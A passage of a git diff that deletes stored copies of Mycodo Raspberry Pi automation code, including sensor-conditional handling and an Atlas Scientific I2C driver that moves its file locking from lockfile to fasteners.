-    def add_measure_influxdb(self):
-        """
-        Add a measurement entries to InfluxDB
-
-        :rtype: None
-        """
-        if self.updateSuccess:
-            data = []
-            for each_measurement, each_value in self.measurement.values.items():
-                data.append(format_influxdb_data(self.unique_id,
-                                                 each_measurement,
-                                                 each_value))
-            write_db = threading.Thread(
-                target=write_influxdb_list,
-                args=(data,))
-            write_db.start()
-
-    def check_conditionals(self, cond_id):
-        """
-        Check if any sensor conditional statements are activated and
-        execute their actions if the conditional is true.
-
-        For example, if measured temperature is above 30C, notify me@gmail.com
-
-        :rtype: None
-
-        :param cond_id: ID of conditional to check
-        :type cond_id: str
-        """
-        logger_cond = logging.getLogger("mycodo.sensor_cond_{id}".format(
-            id=cond_id))
-        attachment_file = False
-        attachment_type = False
-
-        cond = db_retrieve_table_daemon(
-            Conditional, device_id=cond_id, entry='first')
-
-        message = u"[Sensor Conditional: {name} ({id})]".format(
-            name=cond.name,
-            id=cond_id)
-
-        if cond.if_sensor_direction:
-            last_measurement = self.get_last_measurement(
-                cond.if_sensor_measurement)
-            if (last_measurement and
-                    ((cond.if_sensor_direction == 'above' and
-                      last_measurement > cond.if_sensor_setpoint) or
-                     (cond.if_sensor_direction == 'below' and
-                      last_measurement < cond.if_sensor_setpoint))):
-
-                message += u" {meas}: {value} ".format(
-                    meas=cond.if_sensor_measurement,
-                    value=last_measurement)
-                if cond.if_sensor_direction == 'above':
-                    message += "(>"
-                elif cond.if_sensor_direction == 'below':
-                    message += "(<"
-                message += u" {sp} set value).".format(
-                    sp=cond.if_sensor_setpoint)
-            else:
-                logger_cond.debug("Last measurement not found")
-                return 1
-        elif cond.if_sensor_edge_detected:
-            if cond.if_sensor_edge_select == 'edge':
-                message += u" {edge} Edge Detected.".format(
-                    edge=cond.if_sensor_edge_detected)
-            elif cond.if_sensor_edge_select == 'state':
-                if GPIO.input(int(self.location)) == cond.if_sensor_gpio_state:
-                    message += u" {state} GPIO State Detected.".format(
-                        state=cond.if_sensor_gpio_state)
-                else:
-                    return 0
-
-        cond_actions = db_retrieve_table_daemon(ConditionalActions)
-        cond_actions = cond_actions.filter(
-            ConditionalActions.conditional_id == cond_id).all()
-
-        for cond_action in cond_actions:
-            message += u" Conditional Action ({id}): {do_action}.".format(
-                id=cond_action.id, do_action=cond_action.do_action)
-
-            # Actuate relay
-            if (cond_action.do_relay_id and
-                    cond_action.do_relay_state in ['on', 'off']):
-                message += u" Turn relay {id} {state}".format(
-                    id=cond_action.do_relay_id,
-                    state=cond_action.do_relay_state)
-                if (cond_action.do_relay_state == 'on' and
-                        cond_action.do_relay_duration):
-                    message += u" for {sec} seconds".format(
-                        sec=cond_action.do_relay_duration)
-                message += "."
-                relay_on_off = threading.Thread(
-                    target=self.control.relay_on_off,
-                    args=(cond_action.do_relay_id,
-                          cond_action.do_relay_state,),
-                    kwargs={'duration': cond_action.do_relay_duration})
-                relay_on_off.start()
-
-            # Execute command in shell
-            elif cond_action.do_action == 'command':
-                message += u" Execute '{com}' ".format(
-                    com=cond_action.do_action_string)
-
-                command_str = cond_action.do_action_string
-                for each_measurement, each_value in self.measurement.values.items():
-                    command_str = command_str.replace(
-                        "((input_{var}))".format(var=each_measurement), str(each_value))
-                command_str = command_str.replace(
-                    "((input_location))", str(self.location))
-                command_str = command_str.replace(
-                    "((input_period))", str(self.cond_if_sensor_period[cond_id]))
-                _, _, cmd_status = cmd_output(command_str)
-
-                message += u"(Status: {stat}).".format(stat=cmd_status)
-
-            # Capture photo
-            elif cond_action.do_action in ['photo', 'photo_email']:
-                message += u" Capturing photo with camera ({id}).".format(
-                    id=cond_action.do_camera_id)
-                camera_still = db_retrieve_table_daemon(
-                    Camera, device_id=cond_action.do_camera_id)
-                attachment_file = camera_record('photo', camera_still)
-
-            # Capture video
-            elif cond_action.do_action in ['video', 'video_email']:
-                message += u" Capturing video with camera ({id}).".format(
-                    id=cond_action.do_camera_id)
-                camera_stream = db_retrieve_table_daemon(
-                    Camera, device_id=cond_action.do_camera_id)
-                attachment_file = camera_record(
-                    'video', camera_stream,
-                    duration_sec=cond_action.do_camera_duration)
-
-            # Activate PID controller
-            elif cond_action.do_action == 'activate_pid':
-                message += u" Activate PID ({id}).".format(
-                    id=cond_action.do_pid_id)
-                pid = db_retrieve_table_daemon(
-                    PID, device_id=cond_action.do_pid_id, entry='first')
-                if pid.is_activated:
-                    message += u" Notice: PID is already active!"
-                else:
-                    activate_pid = threading.Thread(
-                        target=self.control.controller_activate,
-                        args=('PID',
-                              cond_action.do_pid_id,))
-                    activate_pid.start()
-
-            # Deactivate PID controller
-            elif cond_action.do_action == 'deactivate_pid':
-                message += u" Deactivate PID ({id}).".format(
-                    id=cond_action.do_pid_id)
-                pid = db_retrieve_table_daemon(
-                    PID, device_id=cond_action.do_pid_id, entry='first')
-                if not pid.is_activated:
-                    message += u" Notice: PID is already inactive!"
-                else:
-                    deactivate_pid = threading.Thread(
-                        target=self.control.controller_deactivate,
-                        args=('PID',
-                              cond_action.do_pid_id,))
-                    deactivate_pid.start()
-
-            elif cond_action.do_action in ['email',
-                                           'photo_email',
-                                           'video_email']:
-                if (self.email_count >= self.smtp_max_count and
-                        time.time() < self.smtp_wait_timer[cond_id]):
-                    self.allowed_to_send_notice = False
-                else:
-                    if time.time() > self.smtp_wait_timer[cond_id]:
-                        self.email_count = 0
-                        self.smtp_wait_timer[cond_id] = time.time() + 3600
-                    self.allowed_to_send_notice = True
-                self.email_count += 1
-
-                # If the emails per hour limit has not been exceeded
-                if self.allowed_to_send_notice:
-                    message += u" Notify {email}.".format(
-                        email=cond_action.do_action_string)
-                    # attachment_type != False indicates to
-                    # attach a photo or video
-                    if cond_action.do_action == 'photo_email':
-                        message += u" Photo attached to email."
-                        attachment_type = 'still'
-                    elif cond_action.do_action == 'video_email':
-                        message += u" Video attached to email."
-                        attachment_type = 'video'
-
-                    smtp = db_retrieve_table_daemon(SMTP, entry='first')
-                    send_email(smtp.host, smtp.ssl, smtp.port,
-                               smtp.user, smtp.passw, smtp.email_from,
-                               cond_action.do_action_string, message,
-                               attachment_file, attachment_type)
-                else:
-                    logger_cond.debug(
-                        "Wait {sec:.0f} seconds to email again.".format(
-                            sec=self.smtp_wait_timer[cond_id]-time.time()))
-
-            elif cond_action.do_action == 'flash_lcd':
-                message += u" Flashing LCD ({id}).".format(
-                    id=cond_action.do_lcd_id)
-                start_flashing = threading.Thread(
-                    target=self.control.flash_lcd,
-                    args=(cond_action.do_lcd_id, 1,))
-                start_flashing.start()
-
-        logger_cond.debug(message)
-
-    def lock_multiplexer(self):
-        """ Acquire a multiplexer lock """
-        self.mux_lock_acquired = False
-
-        for i in range(600):
-            self.mux_lock_acquired = self.mux_lock.acquire(blocking=False)
-            if self.mux_lock_acquired:
-                break
-            else:
-                time.sleep(0.1)
-
-        if not self.mux_lock_acquired:
-            self.logger.error(
-                "Unable to acquire lock: {lock}".format(lock=self.mux_lock))
-
-        self.logger.debug(
-            "Setting multiplexer ({add}) to channel {chan}".format(
-                add=self.mux_address_string,
-                chan=self.mux_chan))
-
-        # Set multiplexer channel
-        (multiplexer_status,
-         multiplexer_response) = self.multiplexer.setup(self.mux_chan)
-
-        if not multiplexer_status:
-            self.logger.warning(
-                "Could not set channel with multiplexer at address {add}."
-                " Error: {err}".format(
-                    add=self.mux_address_string,
-                    err=multiplexer_response))
-            self.updateSuccess = False
-            return 1
-
-    def unlock_multiplexer(self):
-        """ Remove a multiplexer lock """
-        if self.mux_lock and self.mux_lock_acquired:
-            self.mux_lock.release()
-
-    def read_adc(self, measurements):
-        """ Read voltage from ADC """
-        try:
-            gotten = False
-            adc_lock = fasteners.InterProcessLock(self.adc_lock_file)
-            for i in range(600):
-                gotten = adc_lock.acquire(blocking=False)
-                if gotten:
-                    break
-                else:
-                    time.sleep(0.1)
-            if not gotten:
-                self.logger.error(
-                    "Unable to acquire lock: {lock}".format(
-                        lock=self.adc_lock_file))
-
-            # Get measurement from ADC
-            measurements = self.adc.next()
-            if measurements is not None:
-                # Get the voltage difference between min and max volts
-                diff_voltage = abs(self.adc_volts_max - self.adc_volts_min)
-                # Ensure the voltage stays within the min/max bounds
-                if measurements['voltage'] < self.adc_volts_min:
-                    measured_voltage = self.adc_volts_min
-                elif measurements['voltage'] > self.adc_volts_max:
-                    measured_voltage = self.adc_volts_max
-                else:
-                    measured_voltage = measurements['voltage']
-                # Calculate the percentage of the voltage difference
-                percent_diff = ((measured_voltage - self.adc_volts_min) /
-                                diff_voltage)
-
-                # Get the units difference between min and max units
-                diff_units = abs(self.adc_units_max - self.adc_units_min)
-                # Calculate the measured units from the percent difference
-                if self.adc_inverse_unit_scale:
-                    converted_units = (self.adc_units_max -
-                                       (diff_units * percent_diff))
-                else:
-                    converted_units = (self.adc_units_min +
-                                       (diff_units * percent_diff))
-                # Ensure the units stay within the min/max bounds
-                if converted_units < self.adc_units_min:
-                    measurements[self.adc_measure] = self.adc_units_min
-                elif converted_units > self.adc_units_max:
-                    measurements[self.adc_measure] = self.adc_units_max
-                else:
-                    measurements[self.adc_measure] = converted_units
-
-            if adc_lock and gotten:
-                adc_lock.release()
-
-        except Exception as except_msg:
-            self.logger.exception(
-                "Error while attempting to read adc: {err}".format(
-                    err=except_msg))
-        return measurements
-
-    def update_measure(self):
-        """
-        Retrieve measurement from sensor
-
-        :return: None if success, 0 if fail
-        :rtype: int or None
-        """
-        measurements = None
-
-        if not self.device_recognized:
-            self.logger.debug("Device not recognized: {device}".format(
-                device=self.device))
-            self.updateSuccess = False
-            return 1
-
-        # Lock multiplexer, if it's enabled
-        if self.multiplexer:
-            self.lock_multiplexer()
-
-        if self.adc:
-            measurements = self.read_adc(measurements)
-        else:
-            try:
-                # Get measurement from sensor
-                measurements = self.measure_sensor.next()
-                # Reset StopIteration counter on successful read
-                if self.stop_iteration_counter:
-                    self.stop_iteration_counter = 0
-            except StopIteration:
-                self.stop_iteration_counter += 1
-                # Notify after 3 consecutive errors. Prevents filling log
-                # with many one-off errors over long periods of time
-                if self.stop_iteration_counter > 2:
-                    self.stop_iteration_counter = 0
-                    self.logger.error(
-                        "StopIteration raised. Possibly could not read "
-                        "sensor. Ensure it's connected properly and "
-                        "detected.")
-            except Exception as except_msg:
-                self.logger.exception(
-                    "Error while attempting to read sensor: {err}".format(
-                        err=except_msg))
-
-        if self.multiplexer:
-            self.unlock_multiplexer()
-
-        if self.device_recognized and measurements is not None:
-            self.measurement = Measurement(measurements)
-            self.updateSuccess = True
-        else:
-            self.updateSuccess = False
-
-        self.lastUpdate = time.time()
-
-    def get_last_measurement(self, measurement_type):
-        """
-        Retrieve the latest sensor measurement
-
-        :return: The latest sensor value or None if no data available
-        :rtype: float or None
-
-        :param measurement_type: Environmental condition of a sensor (e.g.
-            temperature, humidity, pressure, etc.)
-        :type measurement_type: str
-        """
-        last_measurement = read_last_influxdb(
-            self.unique_id, measurement_type, int(self.period * 1.5))
-
-        if last_measurement:
-            last_value = last_measurement[1]
-            return last_value
-        else:
-            return None
-
-    def edge_detected(self, pin):
-        gpio_state = GPIO.input(int(self.location))
-        if time.time() > self.edge_reset_timer:
-            self.edge_reset_timer = time.time()+self.switch_reset_period
-            if (self.switch_edge == 'rising' or
-                    (self.switch_edge == 'both' and gpio_state)):
-                rising_or_falling = 1  # Rising edge detected
-            else:
-                rising_or_falling = -1  # Falling edge detected
-            write_db = threading.Thread(
-                target=write_influxdb_value,
-                args=(self.unique_id, 'edge', rising_or_falling,))
-            write_db.start()
-
-            # Check sensor conditionals
-            for each_cond_id in self.cond_id:
-                if ((self.cond_is_activated[each_cond_id] and
-                        self.cond_if_sensor_edge_select[each_cond_id] == 'edge') and
-                        ((self.cond_if_sensor_edge_detected[each_cond_id] == 'rising' and
-                          rising_or_falling == 1) or
-                         (self.cond_if_sensor_edge_detected[each_cond_id] == 'falling' and
-                          rising_or_falling == -1) or
-                         self.cond_if_sensor_edge_detected[each_cond_id] == 'both')):
-                    self.check_conditionals(each_cond_id)
-
-    def setup_sensor_conditionals(self, cond_mod='setup'):
-        # Signal to pause the main loop and wait for verification
-        self.pause_loop = True
-        while not self.verify_pause_loop:
-            time.sleep(0.1)
-
-        self.cond_id = {}
-        self.cond_action_id = {}
-        self.cond_name = {}
-        self.cond_is_activated = {}
-        self.cond_if_sensor_period = {}
-        self.cond_if_sensor_measurement = {}
-        self.cond_if_sensor_edge_select = {}
-        self.cond_if_sensor_edge_detected = {}
-        self.cond_if_sensor_gpio_state = {}
-        self.cond_if_sensor_direction = {}
-        self.cond_if_sensor_setpoint = {}
-
-        sensor_conditional = db_retrieve_table_daemon(
-            Conditional)
-        sensor_conditional = sensor_conditional.filter(
-            Conditional.sensor_id == self.sensor_id)
-        sensor_conditional = sensor_conditional.filter(
-            Conditional.is_activated == True).all()
-
-        if cond_mod == 'setup':
-            self.cond_timer = {}
-            self.smtp_wait_timer = {}
-        elif cond_mod == 'add':
-            self.logger.debug("Added Conditional")
-        elif cond_mod == 'del':
-            self.logger.debug("Deleted Conditional")
-        elif cond_mod == 'mod':
-            self.logger.debug("Modified Conditional")
-        else:
-            return 1
-
-        for each_cond in sensor_conditional:
-            if cond_mod == 'setup':
-                self.logger.info(
-                    "Activated Conditional ({id})".format(id=each_cond.id))
-            self.cond_id[each_cond.id] = each_cond.id
-            self.cond_is_activated[each_cond.id] = each_cond.is_activated
-            self.cond_if_sensor_period[each_cond.id] = each_cond.if_sensor_period
-            self.cond_if_sensor_measurement[each_cond.id] = each_cond.if_sensor_measurement
-            self.cond_if_sensor_edge_select[each_cond.id] = each_cond.if_sensor_edge_select
-            self.cond_if_sensor_edge_detected[each_cond.id] = each_cond.if_sensor_edge_detected
-            self.cond_if_sensor_gpio_state[each_cond.id] = each_cond.if_sensor_gpio_state
-            self.cond_if_sensor_direction[each_cond.id] = each_cond.if_sensor_direction
-            self.cond_if_sensor_setpoint[each_cond.id] = each_cond.if_sensor_setpoint
-            self.cond_timer[each_cond.id] = time.time() + each_cond.if_sensor_period
-            self.smtp_wait_timer[each_cond.id] = time.time() + 3600
-
-        self.pause_loop = False
-        self.verify_pause_loop = False
-
-    def is_running(self):
-        return self.running
-
-    def stop_controller(self):
-        self.thread_shutdown_timer = timeit.default_timer()
-        if self.device not in ['EDGE', 'ADS1x15', 'MCP342x']:
-            self.measure_sensor.stop_sensor()
-        self.running = False
diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.diff b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.diff
deleted file mode 100644
index e9bb0a6..0000000
--- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.diff
+++ /dev/null
@@ -1,95 +0,0 @@
-diff --git a/mycodo/devices/atlas_scientific_i2c.py b/mycodo/devices/atlas_scientific_i2c.py
- index a193e1e85f246694defb54c3cfe3ea658368ac3c..547f6d9f22e569007c1066e36ee5142f5e1b533d 100644
- --- a/mycodo/devices/atlas_scientific_i2c.py
- +++ b/mycodo/devices/atlas_scientific_i2c.py
-@@ -1,10 +1,11 @@
- # coding=utf-8
-+
-+import fasteners
- import fcntl  # used to access I2C parameters like addresses
- import io  # used to create file streams
- import logging
- import string  # helps parse strings
- import time  # used for sleep delay and timestamps
--from lockfile import LockFile
-
- from mycodo.utils.system_pi import str_is_float
-
-@@ -74,40 +75,40 @@ class AtlasScientificI2C:
-         """ Send command to board and read response """
-         lock_file_amend = '{lf}.{dev}'.format(lf=ATLAS_PH_LOCK_FILE,
-                                               dev=self.current_addr)
--        lock = LockFile(lock_file_amend)
-         try:
--            while not lock.i_am_locking():
--                try:
--                    lock.acquire(timeout=10)  # wait up to 60 seconds before breaking lock
--                except Exception as e:
--                    self.logger.error(
--                        "{cls} 10 second timeout, {lock} lock broken: "
--                        "{err}".format(cls=type(self).__name__,
--                                       lock=ATLAS_PH_LOCK_FILE,
--                                       err=e))
--                    lock.break_lock()
--                    lock.acquire()
--
--            # write a command to the board, wait the correct timeout, and read the response
--            self.write(query_str)
--
--            # the read and calibration commands require a longer timeout
--            if ((query_str.upper().startswith("R")) or
--                    (query_str.upper().startswith("CAL"))):
--                time.sleep(self.long_timeout)
--            elif query_str.upper().startswith("SLEEP"):
--                return "sleep mode"
-+            lock = fasteners.InterProcessLock(lock_file_amend)
-+            lock_acquired = False
-+
-+            for i in range(600):
-+                lock_acquired = lock.acquire(blocking=False)
-+                if lock_acquired:
-+                    break
-+                else:
-+                    time.sleep(0.1)
-+
-+            if lock_acquired:
-+                # write a command to the board, wait the correct timeout, and read the response
-+                self.write(query_str)
-+
-+                # the read and calibration commands require a longer timeout
-+                if ((query_str.upper().startswith("R")) or
-+                        (query_str.upper().startswith("CAL"))):
-+                    time.sleep(self.long_timeout)
-+                elif query_str.upper().startswith("SLEEP"):
-+                    return "sleep mode"
-+                else:
-+                    time.sleep(self.short_timeout)
-+
-+                response = self.read()
-+                lock.release()
-+                return response
-             else:
--                time.sleep(self.short_timeout)
-+                self.logger.error("Could not acquire Atlas I2C lock")
-
--            response = self.read()
--            lock.release()
--            return response
-         except Exception as err:
--            # self.logger.exception(
--            #     "{cls} raised an exception when taking a reading: "
--            #     "{err}".format(cls=type(self).__name__, err=err))
--            lock.release()
-+            self.logger.debug(
-+                "{cls} raised an exception when taking a reading: "
-+                "{err}".format(cls=type(self).__name__, err=err))
-             return "error", err
-
-     def close(self):
-@@ -188,5 +189,6 @@ def main():
-             print("Query failed \n - Address may be invalid, use "
-                   "List_addr command to see available addresses")
-
-+
- if __name__ == "__main__":
-     main()
diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.source.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.source.py
deleted file mode 100644
index 5ed34d7..0000000
--- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.source.py
+++ /dev/null
@@ -1,192 +0,0 @@
-# coding=utf-8
-import fcntl  # used to access I2C parameters like addresses
-import io  # used to create file streams
-import logging
-import string  # helps parse strings
-import time  # used for sleep delay and timestamps
-from lockfile import LockFile
-
-from mycodo.utils.system_pi import str_is_float
-
-from mycodo.config import ATLAS_PH_LOCK_FILE
-
-
-class AtlasScientificI2C:
-    """Class for Atlas Scientific sensor communication via I2C"""
-
-    long_timeout = 1.5  # the timeout needed to query readings and calibrations
-    short_timeout = .5  # timeout for regular commands
-    default_bus = 1  # the default bus for I2C on the newer Raspberry Pis, certain older boards use bus 0
-    default_address = 98  # the default address for the sensor
-
-    def __init__(self, i2c_address=default_address, i2c_bus=default_bus):
-        # open two file streams, one for reading and one for writing
-        # the specific I2C channel is selected with bus
-        # it is usually 1, except for older revisions where its 0
-        # wb and rb indicate binary read and write
-        self.logger = logging.getLogger(
-            "mycodo.device.atlas_scientific_i2c_{add}".format(add=i2c_address))
-        self.current_addr = i2c_address
-        self.setup = True
-        try:
-            self.file_read = io.open("/dev/i2c-" + str(i2c_bus), "rb", buffering=0)
-            self.file_write = io.open("/dev/i2c-" + str(i2c_bus), "wb", buffering=0)
-
-            # initializes I2C to either a user specified or default address
-            self.set_i2c_address(i2c_address)
-        except Exception as err:
-            self.logger.exception(
-                "{cls} raised an exception when initializing: "
-                "{err}".format(cls=type(self).__name__, err=err))
-            self.setup = False
-
-    def set_i2c_address(self, addr):
-        # set the I2C communications to the slave specified by the address
-        # The commands for I2C dev using the ioctl functions are specified in
-        # the i2c-dev.h file from i2c-tools
-        i2c_slave = 0x703
-        fcntl.ioctl(self.file_read, i2c_slave, addr)
-        fcntl.ioctl(self.file_write, i2c_slave, addr)
-        self.current_addr = addr
-
-    def write(self, cmd):
-        # appends the null character and sends the string over I2C
-        cmd += "\00"
-        self.file_write.write(cmd)
-
-    def read(self, num_of_bytes=31):
-        # reads a specified number of bytes from I2C, then parses and displays the result
-        res = self.file_read.read(num_of_bytes)  # read from the board
-        response = filter(lambda x: x != '\x00', res)  # remove the null characters to get the response
-        if ord(response[0]) == 1:  # if the response isn't an error
-            # change MSB to 0 for all received characters except the first and get a list of characters
-            char_list = map(lambda x: chr(ord(x) & ~0x80), list(response[1:]))
-            # NOTE: having to change the MSB to 0 is a glitch in the raspberry pi, and you shouldn't have to do this!
-            str_float = ''.join(char_list)
-            if str_is_float(str_float):
-                return "success", ''.join(char_list)  # convert the char list to a string and returns it
-            else:
-                return "error", "returned string does not represent a float value: {str}".format(str=str_float)
-        else:
-            return "error", str(ord(response[0]))
-
-    def query(self, query_str):
-        """ Send command to board and read response """
-        lock_file_amend = '{lf}.{dev}'.format(lf=ATLAS_PH_LOCK_FILE,
-                                              dev=self.current_addr)
-        lock = LockFile(lock_file_amend)
-        try:
-            while not lock.i_am_locking():
-                try:
-                    lock.acquire(timeout=10)  # wait up to 60 seconds before breaking lock
-                except Exception as e:
-                    self.logger.error(
-                        "{cls} 10 second timeout, {lock} lock broken: "
-                        "{err}".format(cls=type(self).__name__,
-                                       lock=ATLAS_PH_LOCK_FILE,
-                                       err=e))
-                    lock.break_lock()
-                    lock.acquire()
-
-            # write a command to the board, wait the correct timeout, and read the response
-            self.write(query_str)
-
-            # the read and calibration commands require a longer timeout
-            if ((query_str.upper().startswith("R")) or
-                    (query_str.upper().startswith("CAL"))):
-                time.sleep(self.long_timeout)
-            elif query_str.upper().startswith("SLEEP"):
-                return "sleep mode"
-            else:
-                time.sleep(self.short_timeout)
-
-            response = self.read()
-            lock.release()
-            return response
-        except Exception as err:
-            # self.logger.exception(
-            #     "{cls} raised an exception when taking a reading: "
-            #     "{err}".format(cls=type(self).__name__, err=err))
-            lock.release()
-            return "error", err
-
-    def close(self):
-        self.file_read.close()
-        self.file_write.close()
-
-    def list_i2c_devices(self):
-        prev_addr = self.current_addr  # save the current address so we can restore it after
-        i2c_devices = []
-        for i in range(0, 128):
-            try:
-                self.set_i2c_address(i)
-                self.read()
-                i2c_devices.append(i)
-            except IOError:
-                pass
-        self.set_i2c_address(prev_addr)  # restore the address we were using
-        return i2c_devices
-
-
-def main():
-    device = AtlasScientificI2C()
-
-    print(">> Atlas Scientific sample code")
-    print(">> Any commands entered are passed to the board via I2C except:")
-    print(">> List_addr lists the available I2C addresses.")
-    print(">> Address,xx changes the I2C address the Raspberry Pi communicates with.")
-    print(">> Poll,xx.x command continuously polls the board every xx.x seconds")
-    print("   where xx.x is longer than the {to:.2f} second timeout.".format(
-        to=device.long_timeout))
-    print(">> Pressing ctrl-c will stop the polling")
-
-    while True:
-        input_str = raw_input("Enter command: ")
-
-        if input_str.upper().startswith("LIST_ADDR"):
-            devices = device.list_i2c_devices()
-            for i in range(len(devices)):
-                print devices[i]
-
-        # address command lets you change which address the Raspberry Pi will poll
-        elif input_str.upper().startswith("ADDRESS"):
-            addr = int(string.split(input_str, ',')[1])
-            device.set_i2c_address(addr)
-            print("I2C address set to " + str(addr))
-
-        # continuous polling command automatically polls the board
-        elif input_str.upper().startswith("POLL"):
-            delay_time = float(string.split(input_str, ',')[1])
-
-            # check for polling time being too short, change it to the minimum timeout if too short
-            if delay_time < device.long_timeout:
-                print("Polling time is shorter than timeout, setting polling "
-                      "time to {to:.2f}".format(to=device.long_timeout))
-                delay_time = device.long_timeout
-
-            # get the information of the board you're polling
-            info = string.split(device.query("I"), ",")[1]
-            print("Polling {sen} sensor every {sec:.2f} seconds, "
-                  "press ctrl-c to stop polling".format(
-                      sen=info, sec=delay_time))
-
-            try:
-                while True:
-                    print(device.query("R"))
-                    time.sleep(delay_time - device.long_timeout)
-            except KeyboardInterrupt:  # catch ctrl-c
-                print("Continuous polling stopped")
-
-        # if not a special keyword, pass commands straight to board
-        else:
-            if len(input_str) == 0:
-                print "Please input valid command."
-            else:
-                try:
-                    print(device.query(input_str))
-                except IOError:
-                    print("Query failed \n - Address may be invalid, use "
-                          "List_addr command to see available addresses")
-
-if __name__ == "__main__":
-    main()
diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.target.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.target.py
deleted file mode 100644
index 03174db..0000000
--- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.target.py
+++ /dev/null
@@ -1,194 +0,0 @@
-# coding=utf-8
-
-import fasteners
-import fcntl  # used to access I2C parameters like addresses
-import io  # used to create file streams
-import logging
-import string  # helps parse strings
-import time  # used for sleep delay and timestamps
-
-from mycodo.utils.system_pi import str_is_float
-
-from mycodo.config import ATLAS_PH_LOCK_FILE
-
-
-class AtlasScientificI2C:
-    """Class for Atlas Scientific sensor communication via I2C"""
-
-    long_timeout = 1.5  # the timeout needed to query readings and calibrations
-    short_timeout = .5  # timeout for regular commands
-    default_bus = 1  # the default bus for I2C on the newer Raspberry Pis, certain older boards use bus 0
-    default_address = 98  # the default address for the sensor
-
-    def __init__(self, i2c_address=default_address, i2c_bus=default_bus):
-        # open two file streams, one for reading and one for writing
-        # the specific I2C channel is selected with bus
-        # it is usually 1, except for older revisions where its 0
-        # wb and rb indicate binary read and write
-        self.logger = logging.getLogger(
-            "mycodo.device.atlas_scientific_i2c_{add}".format(add=i2c_address))
-        self.current_addr = i2c_address
-        self.setup = True
-        try:
-            self.file_read = io.open("/dev/i2c-" + str(i2c_bus), "rb", buffering=0)
-            self.file_write = io.open("/dev/i2c-" + str(i2c_bus), "wb", buffering=0)
-
-            # initializes I2C to either a user specified or default address
-            self.set_i2c_address(i2c_address)
-        except Exception as err:
-            self.logger.exception(
-                "{cls} raised an exception when initializing: "
-                "{err}".format(cls=type(self).__name__, err=err))
-            self.setup = False
-
-    def set_i2c_address(self, addr):
-        # set the I2C communications to the slave specified by the address
-        # The commands for I2C dev using the ioctl functions are specified in
-        # the i2c-dev.h file from i2c-tools
-        i2c_slave = 0x703
-        fcntl.ioctl(self.file_read, i2c_slave, addr)
-        fcntl.ioctl(self.file_write, i2c_slave, addr)
-        self.current_addr = addr
-
-    def write(self, cmd):
-        # appends the null character and sends the string over I2C
-        cmd += "\00"
-        self.file_write.write(cmd)
-
-    def read(self, num_of_bytes=31):
-        # reads a specified number of bytes from I2C, then parses and displays the result
-        res = self.file_read.read(num_of_bytes)  # read from the board
-        response = filter(lambda x: x != '\x00', res)  # remove the null characters to get the response
-        if ord(response[0]) == 1:  # if the response isn't an error
-            # change MSB to 0 for all received characters except the first and get a list of characters
-            char_list = map(lambda x: chr(ord(x) & ~0x80), list(response[1:]))
-            # NOTE: having to change the MSB to 0 is a glitch in the raspberry pi, and you shouldn't have to do this!
-            str_float = ''.join(char_list)
-            if str_is_float(str_float):
-                return "success", ''.join(char_list)  # convert the char list to a string and returns it
-            else:
-                return "error", "returned string does not represent a float value: {str}".format(str=str_float)
-        else:
-            return "error", str(ord(response[0]))
-
-    def query(self, query_str):
-        """ Send command to board and read response """
-        lock_file_amend = '{lf}.{dev}'.format(lf=ATLAS_PH_LOCK_FILE,
-                                              dev=self.current_addr)
-        try:
-            lock = fasteners.InterProcessLock(lock_file_amend)
-            lock_acquired = False
-
-            for i in range(600):
-                lock_acquired = lock.acquire(blocking=False)
-                if lock_acquired:
-                    break
-                else:
-                    time.sleep(0.1)
-
-            if lock_acquired:
-                # write a command to the board, wait the correct timeout, and read the response
-                self.write(query_str)
-
-                # the read and calibration commands require a longer timeout
-                if ((query_str.upper().startswith("R")) or
-                        (query_str.upper().startswith("CAL"))):
-                    time.sleep(self.long_timeout)
-                elif query_str.upper().startswith("SLEEP"):
-                    return "sleep mode"
-                else:
-                    time.sleep(self.short_timeout)
-
-                response = self.read()
-                lock.release()
-                return response
-            else:
-                self.logger.error("Could not acquire Atlas I2C lock")
-
-        except Exception as err:
-            self.logger.debug(
-                "{cls} raised an exception when taking a reading: "
-                "{err}".format(cls=type(self).__name__, err=err))
-            return "error", err
-
-    def close(self):
-        self.file_read.close()
-        self.file_write.close()
-
-    def list_i2c_devices(self):
-        prev_addr = self.current_addr  # save the current address so we can restore it after
-        i2c_devices = []
-        for i in range(0, 128):
-            try:
-                self.set_i2c_address(i)
-                self.read()
-                i2c_devices.append(i)
-            except IOError:
-                pass
-        self.set_i2c_address(prev_addr)  # restore the address we were using
-        return i2c_devices
-
-
-def main():
-    device = AtlasScientificI2C()
-
-    print(">> Atlas Scientific sample code")
-    print(">> Any commands entered are passed to the board via I2C except:")
-    print(">> List_addr lists the available I2C addresses.")
-    print(">> Address,xx changes the I2C address the Raspberry Pi communicates with.")
-    print(">> Poll,xx.x command continuously polls the board every xx.x seconds")
-    print("   where xx.x is longer than the {to:.2f} second timeout.".format(
-        to=device.long_timeout))
-    print(">> Pressing ctrl-c will stop the polling")
-
-    while True:
-        input_str = raw_input("Enter command: ")
-
-        if input_str.upper().startswith("LIST_ADDR"):
-            devices = device.list_i2c_devices()
-            for i in range(len(devices)):
-                print devices[i]
-
-        # address command lets you change which address the Raspberry Pi will poll
-        elif input_str.upper().startswith("ADDRESS"):
-            addr = int(string.split(input_str, ',')[1])
-            device.set_i2c_address(addr)
-            print("I2C address set to " + str(addr))
-
-        # continuous polling command automatically polls the board
-        elif input_str.upper().startswith("POLL"):
-            delay_time = float(string.split(input_str, ',')[1])
-
-            # check for polling time being too short, change it to the minimum timeout if too short
-            if delay_time < device.long_timeout:
-                print("Polling time is shorter than timeout, setting polling "
-                      "time to {to:.2f}".format(to=device.long_timeout))
-                delay_time = device.long_timeout
-
-            # get the information of the board you're polling
-            info = string.split(device.query("I"), ",")[1]
-            print("Polling {sen} sensor every {sec:.2f} seconds, "
-                  "press ctrl-c to stop polling".format(
-                      sen=info, sec=delay_time))
